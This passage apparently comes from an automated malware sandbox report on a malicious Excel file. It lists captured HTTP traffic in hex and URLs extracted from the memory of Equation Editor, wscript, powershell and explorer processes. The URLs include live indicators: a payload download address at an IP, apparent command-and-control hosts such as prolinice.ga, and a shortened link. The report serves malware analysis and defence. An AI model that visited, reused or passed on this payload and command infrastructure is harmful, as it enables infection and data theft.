6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 78 6d 6c 72 70 63 2e 70 68 70 3e 20 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 3c 2f 73 63 72 69 70 74 3e 20 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 63 6f 6e 6e 65 63 74 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 73 74 79 6c 65 20 69 64 3d 65 74 2d 64 69 76 69 2d 6f 70 65 6e 2d 73 61 6e 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 2f 2a 20 4f 72 69 67 69 6e 61 6c 3a 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 38 2e 31 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 53 61 66 61 72 69 2f 35 33 38 2e 31 20 44 61 75 6d 2f 34 2e 31 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Edge: smart-1.high-performance.networkDate: Mon, 27 May 2024 16:35:15 GMTContent-Length: 102317Server: LINKSGPTCache-Control: no-store, no-cache, must-revalidateConnection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 78 6d 6c 72 70 63 2e 70 68 70 3e 20 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 3c 2f 73 63 72 69 70 74 3e 20 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 63 6f 6e 6e 65 63 74 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 73 74 79 6c 65 20 69 64 3d 65 74 2d 64 69 76 69 2d 6f 70 65 6e 2d 73 61 6e 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 2f 2a 20 4f 72 69 67 69 6e 61 6c 3a 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 38 2e 31 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 53 61 66 61 72 69 2f 35 33 38 2e 31 20 44 61 75 6d 2f 34 2e 31 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Edge: smart-1.high-performance.networkDate: Mon, 27 May 2024 16:35:20 GMTContent-Length: 102317Server: LINKSGPTCache-Control: no-store, no-cache, must-revalidateConnection: keep-alive
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 16:36:08 GMTServer: Apache/2.4.59 (Debian)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 35 32 64 38 38 0d 0a b9 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 44 90 de ef 3f 52 b4 a5 1d 0f 76 5e ee 37 a5 3a 38 64 25 38 a9 5e 19 de 43 7b 19 8a 78 2b e4 d1 73 bb 1b 96 f5 28 a6 be 4e 30 95 05 bc f7 23 ab 0f 0b 51 2a f5 2c 33 4d ed 17 40 1a 79 0c 2b 7b de 73 27 cf 50 68 9e 83 b3 e0 74 d2 13 5d fa 05 cb 86 bf 9a ff 99 b4 c1 53 49 97 f0 22 d3 3a b8 db 32 2e 28 81 82 51 ca 8d b4 0d 1e e5 5a f2 1c 1e 60 9d f8 6c ea 89 06 f0 fe 0b e0 be ed fc ac 8d 8d 20 19 bb ad d3 9e 70 c1 62 64 38 e6 ad f3 9c 8d b7 27 5d c1 30 78 b2 34 fc 64 ca 38 5b 03 cf 4b a0 90 08 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a c0 a1 84 b8 ba d4 a3 62 52 1c ae d9 4b 5a 18 a9 1c db 20 3a d0 44 3f 55 06 6b bf 4b 63 27 f1 ac 4f fe d1 04 8b 3f ba 91 69 f9 fb 81 fe 97 af cd a6 40 69 e9 33 b2 a6 45 cc f6 83 0e 7c 20 5b 7d 1d a4 53 32 fe 9d cc 54 71 e4 4c 20 4c b2 37 b3 8e 0f 1b d8 40 78 f3 c6 c7 84 1a aa 21 d4 fa 17 f2 46 ab 2a 9b db a1 fa 45 c5 f8 a8 f5 78 d7 7b c7 34 f8 40 a6 ce 9e 68 07 d1 3b db 70 67 ae de de 5f 1b 81 d3 b1 e8 be 06 9b bd 51 aa 40 d1 5b 4e 04 32 d7 97 2a e0 96 cc f3 08 be 06 f4 ef f1 48 d0 25 d9 73 3b 22 c7 0f b5 72 bf c3 e5 81 32 31 c9 f4 a1 4c ee 90 56 05 52 a9 1c 76 6f 99 dc ff 39 62 09 4e 0e 7c a8 50 2c 99 64 73 2c f8 8e 19 ec 5e 4c 2b 1b 6a 20 6d e3 2e 26 3e f2 ee 67 21 84 c5 3d 2f 72 90 3a ea 6c 5f b3 01 1d 55 2a 97 6b 1b 48 d7 18 d0 92 ef 20 3e 28 8e b6 b7 0f 4f c2 e3 41 ee a3 e2 e5 4f 7c 04 cf 84 8c 71 e5 91 3b ef 9c 40 2b b4 81 b3 6f 0c e5 ea f4 a9 02 25 53 be 6e 6e 71 ce db f8 20 6e 55 5b a4 66 26 ed 43 1b d2 35 1a 47 54 5d 20 0c 1b 03 8a 54 94 fb f1 d9 5d 91 01 a9 f6 90 b3 3e c6 10 cc 67 ca 7b 76 0b 97 06 5b d8 d2 e2 0f 79 af ed 1b 53 92 e1 e9 cc 7a b6 b9 98 42 38 a5 00 49 58 88 86 83 3c a1 5c d3 72 7d ad bc 8d 80 b4 ea 85 32 d9 b9 33 ce ae d5 90 f4 bb 3a c9 3d 3b 48 a7 e3 58 dd be d0 8a aa 01 3e 48 f4 19 2b 95 d5 65 ff b4 78 a1 d2 cd 69 0a 91 f7 6a 18 3d 4f 75 b1 bc 1b b1 60 c8 27 8c 70 db 33 0d a6 f2 ed 80 8d aa 7c 4a 8c 59 8c 3d 99 a9 52 09 0f d9 5e 58 eb 6f 11 c9 5b 23 0e a9 04 11 b7 a5 6b eb 6e 85 01 89 5e cf 54 06 96 02 2d c3 92 6c 61 40 ee 39 ff fa 3e 0d c6 24 8f 1c 02 ac 7a ab 13 d0 be a8 cb 90 7c 6b d5 fb ae 58 ee db 76 10 36 cb d3 c0 5d 0e e0 08 4f 38 94 52 92 70 bf 7c bd c4 0d 6f f9 74 7a 41 a6 59
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 16:36:17 GMTServer: Apache/2.4.59 (Debian)Content-Length: 409Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 39 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 70 72 6f 6c 69 6e 69 63 65 2e 67 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>
              Source: EQNEDT32.EXE, 00000008.00000002.412851161.00000000002EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.177.156/8080/lionarekingofjungleimageshere.bmp
              Source: EQNEDT32.EXE, 00000008.00000002.412851161.00000000002EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.177.156/8080/lionarekingofjungleimageshere.bmpj
              Source: explorer.exe, 0000000E.00000002.606049641.00000000026D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.607048894.0000000007987000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://aikpfjvjuwcsxfjs.net/
              Source: explorer.exe, 0000000E.00000002.607048894.0000000007987000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://aikpfjvjuwcsxfjs.net/application/x-www-form-urlencodedMozilla/5.0
              Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.use
              Source: explorer.exe, 0000000E.00000002.605324960.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.464250384.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
              Source: powershell.exe, 0000000C.00000002.454053406.00000000032C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: explorer.exe, 00000012.00000002.526156313.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/
              Source: explorer.exe, 00000012.00000002.526156313.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
              Source: explorer.exe, 00000012.00000002.526156313.0000000000664000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.526156313.0000000000694000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.509224452.000000000032E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.513249224.0000000000604000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.605434995.00000000002C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.546090227.000000000013E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.605531849.0000000000684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.605475335.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.605633277.0000000000464000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.605402279.000000000033E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.php
              Source: explorer.exe, 0000000E.00000002.606049641.00000000026D2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.php.
              Source: explorer.exe, 00000012.00000002.526156313.0000000000664000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.509224452.000000000032E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.513249224.0000000000604000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.605434995.00000000002C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.546090227.000000000013E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.605531849.0000000000684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.605475335.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.605633277.0000000000464000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.605402279.000000000033E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.phpMozilla/5.0
              Source: explorer.exe, 00000012.00000002.526156313.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/ndex.php
              Source: powershell.exe, 0000000A.00000002.528301367.000000000259A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.454053406.00000000022A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: explorer.exe, 0000000E.00000002.605324960.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.464250384.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
              Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: explorer.exe, 0000000E.00000002.606556935.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.466925518.000000000797B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.606049641.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.465326275.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.466511830.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
              Source: explorer.exe, 0000000E.00000002.606556935.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.466925518.00000000078D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.466925518.000000000797B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.606049641.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.465326275.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.466511830.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.607048894.00000000078D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
              Source: explorer.exe, 0000000E.00000002.606049641.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.465326275.000000000260D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerxe
              Source: z2.ink.url.4.drString found in binary or memory: http://z2.ink/
              Source: nXPJ.url.4.drString found in binary or memory: http://z2.ink/nXPJ
              Source: #20240627_Edlen_A.xlsString found in binary or memory: http://z2.ink/nXPJk
              Source: ~DFBC2F112CC991C446.TMP.0.dr, 26330000.0.drString found in binary or memory: http://z2.ink/nXPJyX
              Source: explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
              Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
              Source: explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
              Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
              Source: powershell.exe, 0000000C.00000002.454053406.00000000032C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000C.00000002.454053406.00000000032C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000C.00000002.454053406.00000000032C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
              Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
